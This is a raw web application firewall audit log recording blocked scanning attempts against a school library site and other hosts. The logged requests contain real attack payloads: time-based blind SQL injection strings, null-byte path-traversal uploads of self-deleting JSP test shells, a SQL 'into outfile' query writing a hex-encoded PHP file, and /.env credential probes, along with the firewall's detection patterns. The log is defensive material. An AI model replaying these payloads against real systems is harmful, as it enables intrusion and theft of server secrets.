Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d1ec367-Z-- --28231a31-A-- [22/May/2025:08:30:11 +0700] aC5-I2friXjg62qQwE_owQAAAIs 103.236.140.4 42606 103.236.140.4 8181 --28231a31-B-- GET /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168598645 --28231a31-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28231a31-E-- --28231a31-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877411276427 2702 (- - -) Stopwatch2: 1747877411276427 2702; combined=1598, p1=419, p2=1147, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28231a31-Z-- --23fd186d-A-- [22/May/2025:08:30:12 +0700] aC5-JGfriXjg62qQwE_owgAAAIw 103.236.140.4 42606 103.236.140.4 8181 --23fd186d-B-- GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 166625980 --23fd186d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --23fd186d-E-- --23fd186d-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877412273062 2866 (- - -) Stopwatch2: 1747877412273062 2866; combined=1536, p1=426, p2=1079, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23fd186d-Z-- --ac89901c-A-- [22/May/2025:08:30:14 +0700] aC5-JmfriXjg62qQwE_oxAAAAIc 103.236.140.4 42628 103.236.140.4 8181 --ac89901c-B-- POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../ppdqhdnl.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/octet-stream X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166625983 --ac89901c-C-- file error --ac89901c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac89901c-E-- --ac89901c-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=../ppdqhdnl.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877414267651 2467 (- - -) Stopwatch2: 1747877414267651 2467; combined=1279, p1=370, p2=883, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac89901c-Z-- --5b463613-A-- [22/May/2025:08:30:14 +0700] aC5-JmfriXjg62qQwE_oxQAAAIE 103.236.140.4 42632 103.236.140.4 8181 --5b463613-B-- POST /uapws/saveDoc.ajax?ws=/../../0U9nv.jspx%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 314 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 162989786 --5b463613-C-- content= out.println("ilcuotvklp");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --5b463613-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b463613-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../0U9nv.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877414270078 3154 (- - -) Stopwatch2: 1747877414270078 3154; combined=1759, p1=406, p2=1325, p3=0, p4=0, p5=28, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b463613-Z-- --5ae4465a-A-- [22/May/2025:08:30:24 +0700] aC5-MCektx75wRFPQyiCggAAANU 103.236.140.4 42656 103.236.140.4 8181 --5ae4465a-B-- GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 162989798 --5ae4465a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ae4465a-E-- --5ae4465a-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877424287798 2568 (- - -) Stopwatch2: 1747877424287798 2568; combined=1434, p1=421, p2=983, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ae4465a-Z-- --c7d1ab12-A-- [22/May/2025:08:33:41 +0700] aC5-9eThJmFSRJ5-OZdb4wAAAEI 103.236.140.4 42898 103.236.140.4 8181 --c7d1ab12-B-- GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.0 Host: 222.77.136.93 Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 222.77.136.93 X-Forwarded-Server: 222.77.136.93 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 --c7d1ab12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7d1ab12-E-- --c7d1ab12-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||222.77.136.93|F|2"] [data "Matched Data: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi' found within MATCHED_VAR: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877621285689 3957 (- - -) Stopwatch2: 1747877621285689 3957; combined=2632, p1=496, p2=2102, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7d1ab12-Z-- --78dbbd08-A-- [22/May/2025:08:33:42 +0700] aC5-9iektx75wRFPQyiCwgAAAMs 103.236.140.4 42906 103.236.140.4 8181 --78dbbd08-B-- POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=unmhudndps.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 27 User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202) Accept: */* Accept-Language: en Content-Encoding: UTF_8 Content-Type: application/octet-stream serverEnable: localserver X-Forwarded-For: 45.32.66.146 Cookie: LA_K1=langid X-Varnish: 159417366 --78dbbd08-C-- 2xOmGMKL3aNr1bQHLFbc1wZx7QE --78dbbd08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78dbbd08-E-- --78dbbd08-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=unmhudndps.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877622285316 3159 (- - -) Stopwatch2: 1747877622285316 3159; combined=1613, p1=448, p2=1136, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dbbd08-Z-- --228a4017-A-- [22/May/2025:08:35:59 +0700] aC5_f2friXjg62qQwE_o1wAAAIE 103.236.140.4 43062 103.236.140.4 8181 --228a4017-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --228a4017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --228a4017-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747877759834742 767 (- - -) Stopwatch2: 1747877759834742 767; combined=332, p1=295, p2=0, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --228a4017-Z-- --61996435-A-- [22/May/2025:08:50:05 +0700] aC6CzX0O04WKE1HJ5iQDoQAAABY 103.236.140.4 44098 103.236.140.4 8181 --61996435-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.206.169.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --61996435-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61996435-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747878605204029 876 (- - -) Stopwatch2: 1747878605204029 876; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61996435-Z-- --b21db840-A-- [22/May/2025:08:54:53 +0700] aC6D7eThJmFSRJ5-OZdcaQAAAFU 103.236.140.4 44362 103.236.140.4 8181 --b21db840-B-- POST /newsedit/newsplan/task/binary.do HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 166 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 159418172 --b21db840-C-- TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+'0:0:3';select+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1 --b21db840-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b21db840-E-- --b21db840-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /newsedit/newsplan/task/binary.do"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747878893345129 4272 (- - -) Stopwatch2: 1747878893345129 4272; combined=2439, p1=535, p2=1864, p3=0, p4=0, p5=39, sr=82, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b21db840-Z-- --339fd97e-A-- [22/May/2025:09:19:30 +0700] aC6Jsn0O04WKE1HJ5iQEowAAAAg 103.236.140.4 46130 103.236.140.4 8181 --339fd97e-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=zewmnfgq.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 159419072 --339fd97e-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("ybeckexomb");new 
java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundary92pUawKc-- --339fd97e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --339fd97e-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747880370417461 6667 (- - -) Stopwatch2: 1747880370417461 6667; combined=4786, p1=505, p2=4247, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --339fd97e-Z-- --84f26155-A-- [22/May/2025:09:21:35 +0700] aC6KL30O04WKE1HJ5iQErgAAABA 103.236.140.4 46278 103.236.140.4 8181 --84f26155-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Accept-Charset: utf-8 --84f26155-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84f26155-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747880495736511 827 (- - -) Stopwatch2: 1747880495736511 827; combined=339, p1=297, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84f26155-Z-- --ca428a6e-A-- [22/May/2025:09:22:24 +0700] aC6KYGfriXjg62qQwE_pjgAAAII 103.236.140.4 46338 103.236.140.4 8181 --ca428a6e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 Accept-Charset: utf-8 --ca428a6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca428a6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747880544570796 744 (- - -) Stopwatch2: 1747880544570796 744; combined=327, p1=268, p2=0, p3=0, p4=0, p5=59, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca428a6e-Z-- --72c2c474-A-- [22/May/2025:09:35:35 +0700] aC6Ndyektx75wRFPQyiFZgAAAMA 103.236.140.4 53538 103.236.140.4 8181 --72c2c474-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.129.190 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --72c2c474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c2c474-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747881335685483 653 (- - -) Stopwatch2: 1747881335685483 653; combined=252, p1=224, p2=0, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c2c474-Z-- --ebd10247-A-- [22/May/2025:09:43:38 +0700] aC6PWuThJmFSRJ5-OZdf8gAAAE4 103.236.140.4 54266 103.236.140.4 8181 --ebd10247-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ebd10247-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebd10247-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] 